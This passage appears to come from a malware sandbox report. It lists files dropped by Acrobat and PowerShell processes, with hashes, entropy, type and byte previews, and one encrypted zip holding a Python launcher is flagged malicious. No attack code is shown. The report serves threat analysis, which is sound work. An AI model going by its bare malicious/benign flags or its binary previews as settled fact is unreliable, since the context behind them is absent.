                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                              Category:dropped
                              Size (bytes):386528
                              Entropy (8bit):7.9736851559892425
                              Encrypted:false
                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                              Malicious:false
                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                              Category:dropped
                              Size (bytes):1407294
                              Entropy (8bit):7.97605879016224
                              Encrypted:false
                              SSDEEP:24576:/IkwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07mWL07oXGZd:zwZG2b3mlind9i4ufFXpAXkrfUs0CWLk
                              MD5:9431A1C2A3C1BEFE8F3925B1B333DC34
                              SHA1:4E77620153F74BE80B9D533FD16826A276113460
                              SHA-256:9C81A3C6CA676D3D45D2C43A2204E3B78DFB3C0082A1748B67CD9F95AD419ABC
                              SHA-512:56AC05EAAAD17DBBA09E224C4472D1792C5B038ECB976E9DD107817999ACF7E8A217D0E6A61983777569426A7493661CF2CE16FF6753FE8517EFA360B52C871F
                              Malicious:false
                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):98682
                              Entropy (8bit):6.445287254681573
                              Encrypted:false
                              SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                              MD5:7113425405A05E110DC458BBF93F608A
                              SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                              SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                              SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                              Malicious:false
                              Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):737
                              Entropy (8bit):7.501268097735403
                              Encrypted:false
                              SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                              MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                              SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                              SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                              SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                              Malicious:false
                              Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                              Category:dropped
                              Size (bytes):48220749
                              Entropy (8bit):7.995504618527504
                              Encrypted:true
                              SSDEEP:786432:hADXXuC9mkLqH0C1SWvEWbW7ZhG0HQaocLeo0mGztonr3M:ODngkLqHDxsbVh5waNLglT
                              MD5:6D218845785BFF444070175F2C947A58
                              SHA1:AA3371CB30FC5164D8CE5DC5AD2007E057F333A0
                              SHA-256:93F749A6E074EC48BBE2E87F8AF98B8A814BD53F09B1C8ECEDB11A463D1AE8CD
                              SHA-512:B96EF3A88D27C5EE1C6E41D0B582452CCD9DAF0CD2BA4EB60FC84D4C8B4B6CF1C356E2CDFE8C956D457902B45AAC790D60D006E68112615399E795E53BCE7BE8
                              Malicious:true
                              Preview:PK...........X................Python/Launcher/PK........Vv.Xn...44..........Python/Launcher/py.exe.{|.E...L..Cz....!@.h.#.H...$*..1...X..8."tC\..;....rwau....]v....$....<.1..(..]t+.j........$.{.......q.tWW.:u....).k..(....t]..../W.....AH..Z..c.{..,s..ug......w...L...z.a)..e.....{(}......^.l..!.2..+'O.3.t.H.........e#^d..G\...G.F8.......{n|wd6.[8b..p.,....p..oG..].y.}?.`;..'.W..X......f^..`.lI.F.<A...dy)A.8./..[......y...s;?..|.]...6v...M-..R.J.....[..`.u#.....P.F.p.......w...m......eU....L..a_.}a..a...K.$.H..</...+.......9....6(..}.Ep...W,.1.y_A.....K.[......<.\p....7S......u.og...c..:.>......u.....u.F[t.Wi.....A.."..5....b..?.^x'.w.U*bU.X.EW....bA}|.>.].........E.%P..7.c.=.NlP[i..Qu...N..8|.M..t.. l..f..}jm......>._*.>...v....p...P/...t}..#..Yi.C]bAG.k.<}.b.x..*.l.M.,.=.....k(,9..em.VLp.+T(.u..V(.3l.4.j.|z.....a........bh.:A;Aq......S.-.O. .Od[).....[G.Q...@....}z...p:.b.t. ..f.`F....~|...&u= ..U..P....f........F\...G/..)...c....&.?3...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1729230
                              Entropy (8bit):5.068829003493946
                              Encrypted:false
                              SSDEEP:24576:7F4Hmo/1VMkuFLvq1o/1lw2xRQACqw/guOogEtYQfB:7F4Go/1VMkuFLvq1w1lwaRNY/IEhB
                              MD5:3A2F081757C87FE3F9745F2E857755FA
                              SHA1:0D49E71B9E0FFAA4F4DC8DCB45A95BAA664038E7
                              SHA-256:A15B65D338884EF6B8B99EA300405A293DFEC362610E79B8D19755112624210E
                              SHA-512:21F9968546C590D9F8A87333345F6086725905BA2724E5CA5F8F8E1165C20703906FDA8E1D0BF59517ABE8B166B80F47380E70BB535713A1E7E313B673F21FBD
                              Malicious:false
                              Preview:+++++++++++..Python News..+++++++++++....What's New in Python 3.12.3 final?..==================================....*Release date: 2024-04-09*....Security..--------....- gh-issue-115398: Allow controlling Expat >=2.6.0 reparse deferral.. (CVE-2023-52425) by adding five new methods:.... * :meth:`xml.etree.ElementTree.XMLParser.flush`.. * :meth:`xml.etree.ElementTree.XMLPullParser.flush`.. * :meth:`xml.parsers.expat.xmlparser.GetReparseDeferralEnabled`.. * :meth:`xml.parsers.expat.xmlparser.SetReparseDeferralEnabled`.. * :meth:`xml.sax.expatreader.ExpatParser.flush`....- gh-issue-115399: Update bundled libexpat to 2.6.0....- gh-issue-115243: Fix possible crashes in :meth:`collections.deque.index`.. when the deque is concurrently modified.....- gh-issue-114572: :meth:`ssl.SSLContext.cert_store_stats` and.. :meth:`ssl.SSLContext.get_ca_certs` now correctly lock access to the.. certificate store, when the :class:`ssl.SSLContext` is shared across.. multiple threads.....Core and Buil
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:SVG Scalable Vector Graphics image
                              Category:dropped
                              Size (bytes):2041
                              Entropy (8bit):4.73858862289631
                              Encrypted:false
                              SSDEEP:48:rnv4jncfrUrlwFiQy1t/LErdcLpqBpI14P+pz9Y9zcLG6HtSYhLAHt67:I4ASvUSS4Bi14PPe9AW
                              MD5:0AC021A9F4CAE16DF1939CC056AEA75B
                              SHA1:7AB79AB732C9EAC4421A2CE0628E6C09155E5CB2
                              SHA-256:5865BE8BCC0AF888594903EA0112F6C8D923C5726C4081E8C856110CC7339CEF
                              SHA-512:C64D320499DCAE4D3D94ED34FBB741A0335761726276F7FE07D6AD1971742F5F2F3DA25CABBA8A63A7B7BB6CF9CAC9AF71B902CEB03644D2BEE84A24ECFE23E5
                              Malicious:false
                              Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M7.90472 0.00013087C7.24498 0.00316295 6.61493 0.0588153 6.06056 0.15584C4.42744 0.441207 4.13093 1.0385 4.13093 2.14002V3.59479H7.99018V4.07971H4.13093H2.68259C1.56098 4.07971 0.578874 4.7465 0.271682 6.01495C-0.0826595 7.4689 -0.0983765 8.37618 0.271682 9.89434C0.546011 11.0244 1.20115 11.8296 2.32275 11.8296H3.64965V10.0856C3.64965 8.82574 4.75178 7.71441 6.06056 7.71441H9.91531C10.9883 7.71441 11.8449 6.84056 11.8449 5.77472V2.14002C11.8449 1.10556 10.9626 0.328486 9.91531 0.15584C9.25235 0.046687 8.56447 -0.00290121 7.90472 0.00013087ZM5.81767 1.17017C6.2163 1.17017 6.54184 1.49742 6.54184 1.89978C6.54184 2.30072 6.2163 2.62494 5.81767 2.62494C5.41761 2.62494 5.0935 2.30072 5.0935 1.89978C5.0935 1.49742 5.41761 1.17017 5.81767 1.17017Z" fill="url(#paint0_linear)"/>.<path d="M12.3262 4.07971V5.77472C12.3262 7.08883 11.1998 8.19488 9.9153 8.19488H6.06055C5.00466 8.19488 4.13092 9
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):13101
                              Entropy (8bit):4.713844241406214
                              Encrypted:false
                              SSDEEP:384:n1qB1qQsfAYdrXFj1rXc271+GHyUUjEt+XNqX/A:ytwFAGHyUUjI+B
                              MD5:2671E5A932CAF4097FD96F2CA64DDAA9
                              SHA1:815ECD07AE7CDFE81E82E7EB93337D8866C5AC60
                              SHA-256:F3AB1CDBEBD0AB51AA0CAEA1D09C6482FF6E58ED596B9E3BAA0FE47B029FEBA6
                              SHA-512:E3B0E633F206FE416BE283B698099C85F1D800D613365A549211339D5C91008E9E2A51D57035B70B896696702C20783C715F619F3F7E6AAE0D63FFB305DD9BAB
                              Malicious:false
                              Preview:@import url('classic.css');../* unset some styles from the classic stylesheet */.div.document,.div.body,.div.related,.div.body h1,.div.body h2,.div.body h3,.div.body h4,.div.body h5,.div.body h6,.div.sphinxsidebar a,.div.sphinxsidebar p,.div.sphinxsidebar ul,.div.sphinxsidebar h3,.div.sphinxsidebar h3 a,.div.sphinxsidebar h4,..menu a,..menu p,..menu ul,..menu h3,..menu h3 a,..menu h4,.table.docutils td,.table.indextable tr.cap,.pre {. background-color: inherit;. color: inherit;.}../* Add underlines to links */.a[href] {. text-decoration: underline 1px;.}../* Increase the underline offset for code to avoid obscuring underscores */.a[href]:has(> code) {. text-underline-offset: 0.25em;.}../* No underline for navigation */.a.headerlink,.div.genindex-jumpbox a,.div.modindex-jumpbox a,.div#search-results a,.div.sphinxsidebar a,.div.toctree-wrapper a,.div[role=navigation] a,.table.contentstable a,.table.indextable a {. text-decoration: none;.}../* Except when hovered */.div.gen
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):2371
                              Entropy (8bit):5.01984802023824
                              Encrypted:false
                              SSDEEP:48:nXEe+ndCGfCR3OA7Wpd4Ak2ZlnHvXdvnym/t:n2nYpdyfk2j/dn/t
                              MD5:DA320D3DE070F942BDAD563895E7636F
                              SHA1:FD8746DC6D18E076D66AA4C2B6B171056BEEC703
                              SHA-256:84B40EBB0CD283D71C30C96E60FAC3DD9D8C738C813613E99146F4D9AE1874E0
                              SHA-512:2491150B7BDAA4D4693246B25416E2285C43041A45E210777B16B97013544C3B00F7BEEDE4335287D38957BB05C23BA3F5996B3AAC504B7CE76B6F964E2034C6
                              Malicious:false
                              Preview:./* Browser elements */.:root {. scrollbar-color: #616161 transparent;. color-scheme: dark;.}..html,.body {. background-color: #222;. color: rgba(255, 255, 255, 0.87);.}..div.related {. color: rgba(255, 255, 255, 0.7); /* classic overwrite */. border-color: #424242;.}../* SIDEBAR */.div.sphinxsidebar, .menu-wrapper {. background-color: #333;. color: inherit;.}..#sidebarbutton {. /* important to overwrite style attribute */. background-color: #555 !important;. color: inherit !important;.}..div.sidebar, aside.sidebar {. background-color: #424242;. border-color: #616161;.}../* ANCHORS AND HIGHLIGHTS */.div.body a {. color: #7af;.}..div.body a:visited {. color: #09e;.}..a.headerlink:hover {. background-color: #424242;.}..div.related a {. color: currentColor;.}..div.footer,.div.footer a {. color: currentColor; /* classic overwrites */.}..dt:target,.span.highlighted {. background-color: #616161;.}...footnote:target {. background-col
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4976
                              Entropy (8bit):5.069794660694964
                              Encrypted:false
                              SSDEEP:96:mkcWV8kVqVBV7VyVcsEV3V5kFyySeVusw:AWukgv5IPEZK9Esw
                              MD5:0FDF7C5DDE08416916309ED897659073
                              SHA1:351408174FDE3CC5650AF098B603C9B9299DE40B
                              SHA-256:88B3629FD3D7A222217C936818F992B0B6C40DDBB3266B2FA6D56E2A58849B11
                              SHA-512:F276BCC4B4F07BB85B1BD769B3129AE7B37E22B5CE420A058000C7B1F708F4478DF3A84A4896369CC35924A3BAE384FFFF8922ADC937E3828F7F453FEB2F0D1E
                              Malicious:false
                              Preview:pre { line-height: 125%; }..td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }..span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }...highlight .hll { background-color: #ffffcc }...highlight { background: #f8f8f8; }...highlight .c { color: #3D7B7B; font-style: italic } /* Comment */...highlight .err { border: 1px solid #FF0000 } /* Error */...highlight .k { color: #008000; font-weight: bold } /* Keyword */...highlight .o { color: #666666 } /* Operator */...highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */...highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */...highlight .cp { color: #9C6500 } /* Comment.Preproc */...h
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5139
                              Entropy (8bit):5.001030227512549
                              Encrypted:false
                              SSDEEP:48:mkxVA1PP4IDKtrtpALVSVU1lJ6J7oa4a3POWk0xtaCU6KI:mkpICPALVSV0kdFb71BKI
                              MD5:6BAB1AE2E37B08D2BF857361DD07958C
                              SHA1:D9233B5F65A1EBF333EE431A25FE257117C46899
                              SHA-256:B228D5A2C3B6A621F4D8573F755B74C33345C33A009BDBE0C04B855D656AC7A0
                              SHA-512:93895E3C19A26857AD8955258ABF22A1D04A586D5BF48E04A46094F1545653A671BABFE40B2E0B2DFDCE3E359D8A215906A2A4765A9B62435AF88C6EDF50B3D9
                              Malicious:false
                              Preview:pre { line-height: 125%; }..td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }..span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }...highlight .hll { background-color: #49483e }...highlight { background: #272822; color: #f8f8f2 }...highlight .c { color: #959077 } /* Comment */...highlight .err { color: #ed007e; background-color: #1e0010 } /* Error */...highlight .esc { color: #f8f8f2 } /* Escape */...highlight .g { color: #f8f8f2 } /* Generic */...highlight .k { color: #66d9ef } /* Keyword */...highlight .l { color: #ae81ff } /* Literal */...highlight .n { color: #f8f8f2 } /* Name */...highlight .o { color: #ff4689 } /* Operator */...highlight .x { color: #f8f8f2 } /
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):559
                              Entropy (8bit):4.771802759201691
                              Encrypted:false
                              SSDEEP:12:AHo1zeRsmpstIbbIlMwSo/g2bLF9MZXAurGyw8DRRVhioKc:OoVeR7pWIbUabX21ilrGqRR/XKc
                              MD5:E7FFE039348E5AE047B97F246579B381
                              SHA1:301A4DD0FA54530684DE7CC7A863D27C449BA43C
                              SHA-256:0F0595EF5B2C2AFAF36A03DE9CFEF22EF15009DCAA1498AB6C19353C546F5680
                              SHA-512:A6FF347A7C874B322922C63FE1385615C0853E9202B95DF07D891A39032FF830956FBF500387D23C8C190FB14408A20032AD8F2717DE33771C8CE7BFD8AD0775
                              Malicious:false
                              Preview:function isInputFocused() {. const activeElement = document.activeElement;. return (. activeElement.tagName === 'INPUT' ||. activeElement.tagName === 'TEXTAREA' ||. activeElement.isContentEditable. );.}..document.addEventListener('keydown', function(event) {. if (event.key === '/') {. if (!isInputFocused()) {. // Prevent "/" from being entered in the search box. event.preventDefault();.. // Set the focus on the search box. const searchBox = document.getElementById('search-box');. searchBox.focus();. }. }.});.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):18732
                              Entropy (8bit):4.823676806040573
                              Encrypted:false
                              SSDEEP:384:zwrPjkcrIZa8HVkP0l8NK49AEbh0+/gKrQJAyyBMSZxJM:6yl8X1GHy60w
                              MD5:98B20BA46411DEEFA7EFA94524097C2C
                              SHA1:641A3FA218CE4DA2A0A8FE282473D041DB73DC15
                              SHA-256:3012A521CA4C32C56939AF6A67E4F4B8F5FB80C2952E19CBF2FCBD697C4BB37D
                              SHA-512:4D6A716824F08F73178BF1694A0949ED18140D28C045FC0FFE14175B2921A3699541236A98ED187B02789D3DE8B4C6228ADAF1E28267EF882F9AF082B26AA263
                              Malicious:false
                              Preview:/*. * searchtools.js. * ~~~~~~~~~~~~~~~~. *. * Sphinx JavaScript utilities for the full-text search.. *. * :copyright: Copyright 2007-2023 by the Sphinx team, see AUTHORS.. * :license: BSD, see LICENSE for details.. *. */."use strict";../**. * Simple result scoring code.. */.if (typeof Scorer === "undefined") {. var Scorer = {. // Implement the following function to further tweak the score for each result. // The function takes a result array [docname, title, anchor, descr, score, filename]. // and returns the new score.. /*. score: result => {. const [docname, title, anchor, descr, score, filename] = result. return score. },. */.. // query matches the full name of an object. objNameMatch: 11,. // or matches in the last dotted part of the object name. objPartialMatch: 6,. // Additive scores depending on the priority of the object. objPrio: {. 0: 15, // used to be importantResults. 1: 5, // used to be objectResults. 2: -5,
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2697
                              Entropy (8bit):4.868494495669144
                              Encrypted:false
                              SSDEEP:48:XOVOoJmd6l3Jvq12WNu8JCJwaoww6wORyQ+JIeig1TZir1UpYxfSbWhh:XtoJmIl3Jy12WN9JzaXWORydBiEiIY59
                              MD5:DDE60BA867F1238B1446B2049901C00A
                              SHA1:ED59575D1E84E1B7EA5A1C2CB1C766F32AC3B266
                              SHA-256:99E280C84C96C9B75A134BF0F6AA2978BF1F65B7C72A9360D1CBC74BA54FB20A
                              SHA-512:D14D8D7680F976598F4766C90839A1DBB756F48DF360955F8404F375BC6792C70183C37C0E9DDE305D100CBABD3A8BC3CC1373F2DC9E86582F724D93C0374C53
                              Malicious:false
                              Preview:/*.. * sidebar.js.. * ~~~~~~~~~~.. *.. * This file is functionally identical to "sidebar.js" in Sphinx 5.0... * When support for Sphinx 4 and earlier is dropped from the theme,.. * this file can be removed... *.. * This script makes the Sphinx sidebar collapsible... *.. * .sphinxsidebar contains .sphinxsidebarwrapper. This script adds.. * in .sphinxsidebar, after .sphinxsidebarwrapper, the #sidebarbutton.. * used to collapse and expand the sidebar... *.. * When the sidebar is collapsed the .sphinxsidebarwrapper is hidden.. * and the width of the sidebar and the margin-left of the document.. * are decreased. When the sidebar is expanded the opposite happens... * This script saves a per-browser/per-session cookie used to.. * remember the position of the sidebar among the pages... * Once the browser is closed the cookie is deleted and the position.. * reset to the default (expanded)... *.. * :copyright: Copyright 2007-2022 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE f
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text
                              Category:dropped
                              Size (bytes):5123
                              Entropy (8bit):4.925223498348649
                              Encrypted:false
                              SSDEEP:96:FbvH2EYsSlXsiEBQSyy8UoQkfSxPTJlo4Y7D3KZAWZ8IkGPw0F/cafhfuNHeSUEi:FTHxYsfi+1yy+cPTJlo42IAkg0mafhfb
                              MD5:0CD5EF6415C4AF33C6FAF75B54102CF5
                              SHA1:7C8A5B8F897ED4E84ACD956218BEC2216F37C088
                              SHA-256:096231E9C87DF80EC3273DA9C5B71BC81503206726A07A4DD4DE44C256FF859C
                              SHA-512:809358B719AD7F27439E2302E04508A9DBE8CF39723CEF45D3057B23D5673A4024B65B7758A69B49AABF807C1F1A42930874468A7AFBA5539776491049EBF4A7
                              Malicious:false
                              Preview:/* Highlighting utilities for Sphinx HTML documentation. */."use strict";..const SPHINX_HIGHLIGHT_ENABLED = true../**. * highlight a given string on a node by wrapping it in. * span elements with the given class name.. */.const _highlight = (node, addItems, text, className) => {. if (node.nodeType === Node.TEXT_NODE) {. const val = node.nodeValue;. const parent = node.parentNode;. const pos = val.toLowerCase().indexOf(text);. if (. pos >= 0 &&. !parent.classList.contains(className) &&. !parent.classList.contains("nohighlight"). ) {. let span;.. const closestNode = parent.closest("body, svg, foreignObject");. const isInSVG = closestNode && closestNode.matches("svg");. if (isInSVG) {. span = document.createElementNS("http://www.w3.org/2000/svg", "tspan");. } else {. span = document.createElement("span");. span.classList.add(className);. }.. span.appendChild(document.createTextNode(val.substr(pos, text.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):779
                              Entropy (8bit):4.698991607713142
                              Encrypted:false
                              SSDEEP:24:mRR5bRRme4lRWax9cFQk7wGkru5GaMwI8mIG5i9GBoFQ5:m9bae4lw6yFQdGeaMwrz2i9PFQ5
                              MD5:4B5EEF9423B62E66EB345DC601BFC288
                              SHA1:5ED1C79C5A3573B233A74D344D2E2A720D433B5B
                              SHA-256:E83D4B134C20F038CF3FBEFAFCAC4F0B15DD224FA0189257E436291C52C6D54C
                              SHA-512:28D938C7308522E2BE6BEFD230FC74CE7119C0DEFC3054951DF529412CC143C94D62FEAF1643DF0F55EB92A9992775184211425057CD5A470253136A4054CB30
                              Malicious:false
                              Preview:const pydocthemeDark = document.getElementById('pydoctheme_dark_css').const pygmentsDark = document.getElementById('pygments_dark_css').const themeSelectors = document.getElementsByClassName('theme-selector')..function activateTheme(theme) {. localStorage.setItem('currentTheme', theme);. [...themeSelectors].forEach(e => e.value = theme). switch (theme) {. case 'light':. pydocthemeDark.media = 'not all'. pygmentsDark.media = 'not all'. break;. case 'dark':. pydocthemeDark.media = 'all'. pygmentsDark.media = 'all'. break;. default:. // auto. pydocthemeDark.media = '(prefers-color-scheme: dark)'. pygmentsDark.media = '(prefers-color-scheme: dark)'. }.}..activateTheme(localStorage.getItem('currentTheme') || 'auto').
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):14755
                              Entropy (8bit):4.825013643605692
                              Encrypted:false
                              SSDEEP:192:kKddXojUHtxX1vlVMxNr0necMGf5D7Yr4EVMFkcnscMGfZ76dqEC:pd1Htxlon0necMmf+4P2cnscMG76dqEC
                              MD5:6DECA5ED947F3B43B2088EB4CB82B47C
                              SHA1:B0F6E8E262153DDDAD5EBCAC82A1DD6419BC5904
                              SHA-256:C4B77A791522911C51966D765048CE9716580E6212E39AC95B359BF785EA3E40
                              SHA-512:8DA915C66A2A346FC948A1B8FECD69BEEABB948C24A48DCAEA4AF0A99361392F69D10329540BFAE7A4CD147B95ADF46E6CA0BF4D0CE38F9C7CA8342C6E0D0565
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="About these documents" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/about.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These documents are generated from reStructuredText sources by Sphinx, a document processor specifically written for the Python documentation. Development of the documentation and its toolchain is ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These documents are generated from reStructuredText sources by Sphinx,
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19744
                              Entropy (8bit):4.88174789711368
                              Encrypted:false
                              SSDEEP:384:cQlHtxlMqenFcM5ZwZPfVHiMJFbr6nJcMb76dqEC:cQ1tPMRqM5ZePfVfFbWmMb764N
